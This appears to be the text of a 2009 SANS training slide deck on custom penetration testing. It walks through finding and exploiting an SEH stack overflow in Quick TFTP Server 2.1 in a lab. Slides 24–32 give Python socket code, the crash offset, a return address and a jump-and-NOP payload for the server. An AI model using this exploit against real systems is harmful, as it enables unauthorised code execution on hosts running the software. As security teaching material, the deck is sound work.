Custom Penetration Testing

Custom Penetration Testing Compromising a Vulnerability through Discovery and Custom Exploitation Stephen Sims Advanced Penetration Testing - 2009 SANS 1

Objectives Penetration Testing Precompiled Tools Targeting TFTP Testing a TFTP Server for Bugs Discovering the Bug Exploiting the TFTP Server Advanced Concepts Advanced Penetration Testing - 2009 SANS 2

What is Penetration Testing? Process of testing a target environment for weaknesses More thorough than vulnerability scanning alone Validates findings by exploiting flaws Allows you to think like an attacker Various levels of interaction/depth Advanced Penetration Testing - 2009 SANS 3

Types of Penetration Testing Black-Box Penetration Testing No access to source code No access provided to OS, architecture, etc More like an outsider attack scenario More time consuming Crystal-Box Penetration Testing Tester given source code, system & network architecture and/or privileged system access More thorough than black-box testing Cost effective Advanced Penetration Testing - 2009 SANS 4

Precompiled Tools Pros Can quickly be used Customer support Broad user community Often allow custom scripts or modules Cons Limited in scope Only discover and test known vulnerabilities Skilled attackers are not relying solely on them Precompiled tools offer a sense of complacency Do not perform code coverage or do deep fuzzing Advanced Penetration Testing - 2009 SANS 5

Targeting General Steps 1. Determine Target Application and Operating System 2. Obtain a Copy of the Application 3. Analyze RFC and Communications Protocols 4. Discover and Record a Crash Condition 5. Analyze Crash Condition for Exploitation Opportunities Advanced Penetration Testing - 2009 SANS 6

1) Determine Target Application and Operating System What application/service are you analyzing? What OS is it available for? Which one(s) are you interested in? What services does the application start up? There may be several Scanning may help Analyze documentation and code if possible Are the services proprietary or standards-based? Proprietary often offer a lot of new opportunities Advanced Penetration Testing - 2009 SANS 7

2) Obtain a Copy of the Application Create a lab environment and install the application Use the OS you are targeting Utilize Virtual Machines Create snapshots prior to installation Install monitoring tools Attempt to obtain the source code Code analysis is often more complex than behavioral analysis, but valuable Advanced Penetration Testing - 2009 SANS 8

3) Analyze RFC and Communications Protocols Is documentation available? Programmers should follow RFC s Search RFC for potential options and fields that may contain opportunities to cause a fault Understand each aspect of the protocols used by the application and relative behavior Is architectural documentation available? Advanced Penetration Testing - 2009 SANS 9

4) Discover and Record a Crash Condition Are you properly monitoring? Sniffers to record packets sent to the application Wireshark/Tshark, tcpdump, etc Packets can be recorded and replayed Debuggers to record application behavior while receiving/handling data OllyDbg, Immunity Debugger, WinDbg OS monitoring tools to monitor health ProcMon, RegMon, FileMon, RegShot, etc The condition must be repeatable Advanced Penetration Testing - 2009 SANS 10

5) Analyze Crash Condition for Exploitation Opportunities What is happening during the crash? Analyze the status of each register Are registers holding or pointing to strange values? e.g. 0x41414141 if inputting A s Is the Return Pointer or SEH chain being overwritten? Analyze the stack segment and monitor ESP/EBP Are heap pointers being overwritten? Analyze dynamic memory allocations and behavior There s way more to analyze, but this is a start! Advanced Penetration Testing - 2009 SANS 11

Targeting (2) Our goal is to discover and exploit a Windows Program vulnerability! The techniques we ll cover is applicable with any target or service We re targeting a TFTP service Must understand how the protocol works Developers should follow RFC s We can leverage the RFC as well Could use fuzzing to automate bug discovery Advanced Penetration Testing - 2009 SANS 12

Our TFTP Target Quick TFTP Server Pro Version 2.1 Vulnerable to a stack-based buffer overflow Can exploit by overwriting the Structured Exception Handling (SEH) chain Allows for DoS or code execution as System TFTP Server Published by TallSoft Vulnerability discovered in 2008 by Mati Aharoni of Offensive Security Advanced Penetration Testing - 2009 SANS 13

TFTP Trivial File Transfer Protocol (TFTP) Simple protocol for transferring files over a network Clear-text protocol using UDP port 69 Used for transferring files by network devices, VOIP phones and other client-server programs Advanced Penetration Testing - 2009 SANS 14

TFTP Behavior Connection request is combined with either a read or write request Blocks of data are sent in a fixed 512 byte size Each block must be acknowledged for error control A block less than 512 bytes indicates the end of the stream Advanced Penetration Testing - 2009 SANS 15

TFTP Behavior (2) The first two bytes of a TFTP header indicates the request type and format \x00\x01 indicates a read request \x00\x02 indicates a write request \x00\x03 indicates the data block \x00\x04 is an acknowledgement \x00\x05 indicates an error \x00\x06 is an optional acknowledgement Advanced Penetration Testing - 2009 SANS 16

TFTP Behavior (3) Read and Write request format: \x00\x01 for read \x00\x02 for write File Name Null byte - \x00 Mode Binary, ASCII or Mail Null byte - \x00 Example Request Type File Name Null Mode Null Read \x00\x01 file1.txt 0 Octet 0 Advanced Penetration Testing - 2009 SANS 17

Hacking Quick TFTP Server Quick TFTP Server Version 2.1 Install tftpserver_setup.exe onto a Windows XP Virtual Machine Use the TFTP information just covered to help with the investigation Attempt to crash the TFTP server while running in a debugger Create a custom script to start the testing Validate findings Attempt code execution Advanced Penetration Testing - 2009 SANS 18

Tools We Need Programming/Scripting Language Python, Perl, Ruby, C Debugger and Disassembler OllyDbg, Immunity Debugger, IDAPro Shellcode Metasploit, Milw0rm, Custom An open mind! Knowledge of OS controls, Opcodes, Tricks Advanced Penetration Testing - 2009 SANS 19

Python Object-oriented, High-level Programming Language Very Intuitive Very Modular No Manual Compilation Plays well with other languages C, C++, Jython, IronPython (.NET) Good Debugging Advanced Penetration Testing - 2009 SANS 20

Tool: OllyDbg Software Debugger for Windows Author: Oleh Yuschuk Shareware! Binary Code Analysis Register Contents, Procedures, API Calls, Patching, memory searching and more! Advanced Penetration Testing - 2009 SANS 21

Hacking TFTP Hint #1 Consider the format of TFTP requests for your script We covered the order a few slides ago Read & Write requests are often the easiest to attack as they have variable fields They start with \x00\x01 & \x00\x02 The header format must be correct to trigger a valid response Command line scripting not always the best option You may want to write a script Advanced Penetration Testing - 2009 SANS 22

Hacking TFTP Hint #2 Where could a buffer overflow condition exist? Try the request type field, file name and/or the mode Don t forget the nulls to terminate! Make sure you re watching the right thread in OllyDbg Processes have multiple threads on Windows Advanced Penetration Testing - 2009 SANS 23

Hacking TFTP Hint #3 The easiest way is to use Python or Perl to open a socket and send your script import socket import sys target = IP ADDRESS #Enter the right IP here port = 69 #Port for TFTP s = socket.socket(socket.af_inet, socket.sock_dgram) cmd = "A"*10 #Enter the number of A's to send data = "\x00\x01"+ cmd #Modify this line to format your packet s.sendto(data, (target, port)) Advanced Penetration Testing - 2009 SANS 24

Quick TFTP Walk-Through Start Quick TFTP Server with Olly Ignore entry point messages Press F9 once loaded Click OK on the demo pop-up Advanced Penetration Testing - 2009 SANS 25

Quick TFTP Walk-Through (2) This may be possible via command line, but We need a script! Don t forget the formatting of TFTP read and write requests: Request Type File Name Null Mode Null Read \x00\x01 file1.txt 0 Octet 0 The overflow is in the mode section! Advanced Penetration Testing - 2009 SANS 26

Quick TFTP Walk-Through (3) Write a python script that connects to the TFTP server with 1000 A s No Crash in Olly Advanced Penetration Testing - 2009 SANS 27

Quick TFTP Walk-Through (4) 1060 A s EIP is 41414141 Success! Olly has paused Advanced Penetration Testing - 2009 SANS 28

Quick TFTP Walk-Through (5) What are we overwriting? We overwrote the SEH Chain! Lets do some math to see where the overflow is occurring Advanced Penetration Testing - 2009 SANS 29

Quick TFTP Walk-Through (6) Subtracting 41 A s should take us to the SEH handler Lets give it a try by setting: cmd = "A"*1023+"\xde\xc0\xad\xde" We control EIP at 1023 bytes! Advanced Penetration Testing - 2009 SANS 30

Quick TFTP Walk-Through (7) We now need to find a valid pop/pop/ret instruction Use the findjmp tool and experiment 0x77ec9cac is one I chose from kernel32.dll for XP SP1 Remember that you must compensate for SafeSEH if hacking XP SP2/SP3 Also remember that not every pop/pop/ret address will work. You gotta dig Advanced Penetration Testing - 2009 SANS 31

Quick TFTP Walk-Through (8) Finalizing our script cmd = "A"*1019+"\xeb\x06\x90\x90"+"\xac\x9c\xec\x77"+"\x90"*4+sc data = "\x00\x01" + "blah" + "\x00"+cmd+"\x00 Our jmp and pointer Our NOP s and shellcode Advanced Penetration Testing - 2009 SANS 32

Advanced Concepts Depending on the OS Version, a number of controls have been added SafeSEH Protects SEH pointers against overwrites ASLR Randomizes locations of libraries and memory segments DEP Prevents code execution on the stack and heap Security Cookies Pushes unique values onto the stack and heap during allocations which are checked upon exit or free Every byte in memory is a potential full or partial opcode As long as the segment is executable Advanced Penetration Testing - 2009 SANS 33

More Information Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server by David Litchfield http://www.nextgenss.com/papers/defeating-w2k3-stackprotection.pdf Preventing the Exploitation of SEH Overwrites by Skape Matt Miller http://www.uninformed.org/?v=5&a=2&t=pdf SEH Overwrites Simplified v1.01 by Aelphaeis Mangaraehttp://www.milw0rm.com/papers/187 Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass by Alexander Anisimov http://www.maxpatrol.com/defeating-xpsp2-heap-protection.pdf Reliable Windows Heap Exploits by Matt Conover & Oded Horovitz http://www.slideshare.net/amiable_indian/reliable-windows-heap-exploits Third Generation Exploitation by Halvar Flake www.blackhat.com/presentations/win-usa- 02/halvarflake-winsec02.ppt Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server by David Litchfield http://www.ngssoftware.com/papers/defeating-w2k3-stackprotection.pdf Heap Feng Shui in JavaScript by Alexander Sotirov http://www.blackhat.com/presentations/bh-europe-07/sotirov/presentation/bh-eu-07- sotirov-apr19.pdf Understanding Windows Shellcode by Skape http://www.hick.org/code/skape/papers/win32- shellcode.pdf Advanced Penetration Testing - 2009 SANS 34

End Questions? SANS SEC709 Developing Exploits for Penetration Testers and Security Researchers stephen@deadlisting.com Advanced Penetration Testing - 2009 SANS 35